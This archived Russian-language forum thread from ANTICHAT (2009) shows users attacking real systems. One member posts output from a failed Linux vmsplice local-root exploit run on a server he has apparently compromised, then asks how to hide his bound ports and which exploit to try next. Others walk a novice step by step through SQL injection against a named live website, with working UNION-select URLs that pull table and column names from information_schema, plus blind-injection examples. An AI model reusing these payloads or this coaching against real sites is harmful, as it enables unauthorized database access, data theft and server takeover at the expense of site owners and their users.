ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.10.2009, 11:15
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
p.r0phe.t
да кинь ты уже кому нить линк в пм!
|
|
|
31.10.2009, 11:23
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от Rubaka
p.r0phe.t
да кинь ты уже кому нить линк в пм!
К шелу линк? хм.
Мне для себя интересно поковыряться.
В общем разобрался,сплойт не проканал =(
sh-3.1$ ./expl
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e22000 .. 0xb7e54000
[-] vmsplice: Bad address
Снова есть вопрос
Как прикрыть забинденные мной порты? =)
И какой ещё сплойт под эту систему посоветуете
Linux yesclub 2.6.18-6-686
Последний раз редактировалось p.r0phe.t; 31.10.2009 в 11:43..
|
|
|
|
31.10.2009, 12:55
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
LokbatanLi
Прочитай то что тебе люди рекомендуют, если бы перевел захексенное в текст в последнем моем запросе для тебя, то о чудо там бы и ссыль на как ракрутить скулю была и еще многие ответы на твои вопросы, а если тебе не подобрать число столбцов в скуле то или ищи в другом месте скулю с выводом , или крути cкулю как слепую (блайнд)
http://www.xxx.com/news.php?iid=1+AND+SUBSTRING((version())=x
где х меняешь в соответствие с запросом...
или
http://www.xxx.com/news.php?iid=1+AND+ASCII(SUBSTRING((version() ),1,1))>char твоего запроса
www.translit.ru обеспечит нормальное отношение к тебе и позволит сформулировать вопрос на который можно будет ответить ...
|
|
|
|
31.10.2009, 13:15
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
vot naprimer
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*
zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
|
|
|
|
31.10.2009, 13:21
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от LokbatanLi
vot naprimer
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*
zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??
Не совсем тебя понял, но попытаюсь предположить:
Выводимые поля: 4,5.
Вместо любого из них поставляем version(). Запрос принимает вид:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/*
Если версия 5, значит нам доступна information_schema, tables и columns соответственно.
Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*
Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано.
Далее - хотим узнать имя колонки. Делаем запрос:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns/*
Нужную перебираем тем же способом, что и имена таблиц.
Я тебя правильно понял, или всё ещё нет?
|
|
|
|
31.10.2009, 13:20
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
LokbatanLi
Меня поражает ваше упорство задавать такие дурацкие вопросы...вы вообще читаете что вам люди отвечают и рекомендуют? если вы не считаете нужным следовать советам участникам форума, то зачем же тогда спрашивать?или вам всю статью про скули и раскрутку их суда переписать? Вы случаем не ошиблись? видимо из вас не то что хакера..ламера нормального не получится...
З.Ы. Прошу модеров не считать мои высказывания за флуд !
|
|
|
|
31.10.2009, 13:24
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
offf blin zdes est nomerki 4,5 a esli bi ix ne bival 4to zdelali?? kak mojem uznat v kakom nomere sidyat columns name
|
|
|
|
31.10.2009, 13:28
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
LokbatanLi ну ты ёпрст задолбал уже..нет вывода ..значит крути как слепую...я тебе же написал выше...
З.Ы. В таджикистоне тоже каникулы?
|
|
|
|
31.10.2009, 13:28
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Вот рабочий пример для твоей ссылки:
Код:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,group_concat(0x20,column_name),6,7+from+information_schema.columns+where+table_name=0x7573657273/*
Вывод колонок из таблицы "users' (0x7573657273 - имя таблицы в hex). |
|
|
|
31.10.2009, 13:32
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
